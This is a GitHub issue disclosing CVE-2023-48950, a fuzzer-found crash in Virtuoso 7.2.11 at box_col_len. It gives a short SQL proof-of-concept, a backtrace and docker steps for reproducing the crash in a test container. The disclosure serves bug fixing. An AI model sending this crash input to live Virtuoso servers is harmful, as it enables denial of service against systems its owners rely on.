CVE-2023-48950: Fuzzer: Virtuoso 7.2.11 crashed at box_col_len · Issue #1174 · openlink/virtuoso-opensource

The PoC is generated by my DBMS fuzzer.

CREATE TABLE v0 ( v1 nvarchar ) ; 
 INSERT INTO v0 VALUES ( 1 ) ; 
 INSERT INTO v0 SELECT MAX ( DISTINCT v1 ) FROM v0 ; 
 INSERT INTO v0 SELECT v1 FROM v0 WHERE ( SELECT ( SELECT v1 FROM v0 ) ) ; 

backtrace:

#0 0x86df90 (box_col_len+0x90)
#1 0x88c0af (key_vec_insert+0x9df)
#2 0x7b679b (insert_node_run+0x8fb)
#3 0x7b6b1c (insert_node_input+0x11c)
#4 0x7af05e (qn_input+0x3ce)
#5 0x7af78f (qn_ts_send_output+0x23f)
#6 0x7b509e (table_source_input+0x16ee)
#7 0x7af05e (qn_input+0x3ce)
#8 0x7af4c6 (qn_send_output+0x236)
#9 0x8214bd (set_ctr_vec_input+0x99d)
#10 0x7af05e (qn_input+0x3ce)
#11 0x7c1be9 (qr_dml_array_exec+0x839)
#12 0x7ce602 (sf_sql_execute+0x15d2)
#13 0x7cecde (sf_sql_execute_w+0x17e)
#14 0x7d799d (sf_sql_execute_wrapper+0x3d)
#15 0xe214bc (future_wrapper+0x3fc)
#16 0xe28dbe (_thread_boot+0x11e)
#17 0x7ff3d19ba609 (start_thread+0xd9)
#18 0x7ff3d178a133 (clone+0x43)

ways to reproduce (write poc to the file /tmp/test.sql first):

# remove the old one
docker container rm virtdb_test -f
# start virtuoso through docker
docker run --name virtdb_test -itd --env DBA_PASSWORD=dba openlink/virtuoso-opensource-7:7.2.11
# wait the server starting
sleep 10
# check whether the simple query works
echo "SELECT 1;" | docker exec -i virtdb_test isql 1111 dba
# run the poc
cat /tmp/test.sql | docker exec -i virtdb_test isql 1111 dba